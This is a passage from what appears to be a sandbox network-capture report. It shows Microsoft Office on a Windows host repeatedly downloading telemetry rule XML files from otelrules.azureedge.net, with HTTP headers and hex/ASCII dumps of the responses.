54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	49854	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:11 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:11 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:11 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: f884d1af-801e-008f-4f68-322c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001511Z-17df447cdb5g2j9ghC1DFWuyag00000003z0000000002zfv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:11 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	49856	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:11 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:11 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:11 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: da0c988b-a01e-006f-6753-3213cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001511Z-17df447cdb5jg4kthC1DFWux4n00000009k000000000m3px x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:11 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	49855	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:11 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:11 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:11 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 34ab5445-001e-0079-1b58-2e12e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001511Z-17df447cdb56mx55hC1DFWvbt400000006f000000000mrxu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:11 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.4	49857	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:11 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:11 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:11 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 543acbd8-b01e-0084-71a3-31d736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001511Z-15869dbbcc662ldwhC1DFWh4e000000003q000000000p20m x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:11 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.4	49858	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:12 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:12 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:12 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: 96da997d-001e-0028-355d-2cc49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001512Z-16547b76f7fknvdnhC1DFWxnys0000000dgg000000000axn x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:12 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	49859	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:12 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:12 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:12 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: d0f3247f-701e-0053-2699-313a0a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001512Z-17df447cdb59mt7dhC1DFWqpg400000009r0000000005z7e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:12 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	49860	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:12 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:12 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:12 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: 8ce30eab-001e-0082-5d53-325880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001512Z-15869dbbcc6tfpj2hC1DFW384c000000075g000000006ab9 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:12 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.4	49862	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:13 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:13 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:13 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: 48d17247-501e-00a0-2f4d-2e9d9f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001513Z-15869dbbcc6lq2lzhC1DFWym6c00000008pg000000004050 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:13 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	49863	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:13 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:13 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:13 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: 2ce7ce6f-901e-002a-1fd2-2c7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001513Z-16547b76f7f7lhvnhC1DFWa2k00000000da00000000072gd x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:13 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	49864	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:13 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:13 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:13 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: 86fb53ab-501e-0078-4ed2-2c06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001513Z-16547b76f7fcrtpchC1DFW52e80000000dg0000000002cdy x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:13 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.4	49865	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:13 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:13 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:13 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: bddab262-201e-0085-5e12-3334e3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001513Z-17df447cdb5vq4m4hC1DFWrbp800000009h000000000fuse x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:13 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	49861	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:13 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:13 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:13 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: 192ab198-001e-00a2-4569-32d4d5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001513Z-15869dbbcc6vr5dxhC1DFWqn64000000081000000000mfd9 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
